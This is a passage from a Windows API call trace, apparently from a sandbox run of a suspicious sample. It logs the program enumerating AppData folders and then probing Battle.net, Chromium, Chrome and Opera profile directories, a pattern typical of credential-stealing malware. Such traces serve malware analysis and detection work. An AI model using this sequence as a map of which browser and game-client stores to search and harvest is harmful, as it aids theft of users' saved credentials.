hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.751] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0221.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.752] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0221.752] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcb83e350, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcb83e350, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcb83e350, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.753] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcb83e350, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcb83e350, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcb83e350, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.753] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcb83e350, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcb83e350, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcb83e350, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.753] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.754] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0221.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.754] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0221.754] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.755] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.755] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.755] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.756] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0221.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.756] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0221.756] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.759] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0221.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.759] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0221.759] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.760] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.760] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.760] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.761] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0221.761] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.761] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.762] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.762] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.762] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0221.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.763] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0221.763] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.763] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.763] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 1 [0221.763] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 0 [0221.764] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.765] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0221.765] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.765] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.766] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 1 [0221.766] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.766] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.767] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0221.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.767] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0221.767] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.768] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.768] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9e0476d0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0x9e0476d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x9e0476d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.768] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0221.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.883] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0221.883] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0221.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.886] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0221.886] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.888] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.888] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0221.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.888] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0221.888] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0221.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.890] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0221.891] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.893] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.893] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0221.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.893] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", 